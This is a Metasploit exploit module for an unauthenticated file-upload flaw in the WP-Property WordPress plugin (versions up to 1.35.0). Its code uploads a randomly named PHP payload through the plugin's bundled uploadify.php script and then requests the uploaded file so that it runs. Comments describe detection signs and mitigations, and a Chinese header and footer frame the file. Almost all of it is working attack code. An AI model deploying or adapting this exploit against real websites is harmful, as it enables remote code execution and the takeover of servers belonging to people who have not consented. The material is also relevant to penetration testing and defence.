WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (versions <= 1.35.0, per the module description).
#
# Notes for defenders, derived from what this module sends:
# * The vulnerable endpoint is the bundled uploader at
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php.
# * The upload is a multipart POST with a "Filedata" part whose filename ends
#   in ".php" and a "folder" field pointing back at the uploadify directory.
#   It is followed by a GET for the path the server echoed in the response.
#   Both requests are visible in web-server access logs.
# * Mitigation: upgrade the plugin past the affected range, remove or deny
#   direct access to the third-party/uploadify directory, and disable PHP
#   execution in directories that accept uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, references, targets) and the single
  # TARGETURI option that locates the WordPress installation.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Non-intrusive probe: requests the uploader script and reports on the
  # HTTP status alone.
  #
  # NOTE(review): a 200 only shows that uploadify.php is reachable. Nothing
  # here inspects the plugin version, so "Appears" can be reported for a
  # patched or otherwise protected installation.
  def check
    base_path = target_uri.path
    base_path << '/' unless base_path[-1, 1] == '/'

    response = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{base_path}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless response && response.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a randomly named .php file through uploadify.php, then requests
  # the path the server returned in the response body.
  #
  # Aborts with Failure::UnexpectedReply when the upload response is missing,
  # is not a 200, or does not mention the uploaded file name.
  def exploit
    base_path = target_uri.path
    base_path << '/' unless base_path[-1, 1] == '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # presumably :unlink_self makes the dropped stub delete itself after it
    # runs, so the file may be gone from disk afterwards (verify against the
    # PhpEXE mixin)
    stub = get_write_exec_payload(:unlink_self=>true)

    form = Rex::MIME::Message.new
    form.add_part(stub, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    form.add_part("#{base_path}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Rewrite the boundary lines that follow an empty line so they drop the
    # leading CRLF.
    body = form.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    upload_response = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{base_path}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{form.bound}",
      'data'   => body
    })

    unless upload_response && upload_response.code == 200 && upload_response.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the location of the uploaded file.
    stored_at = upload_response.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => stored_at,
      'method' => 'GET'
    })
  end
end

不要问我这写的是什么 怎么利用 我是说msf.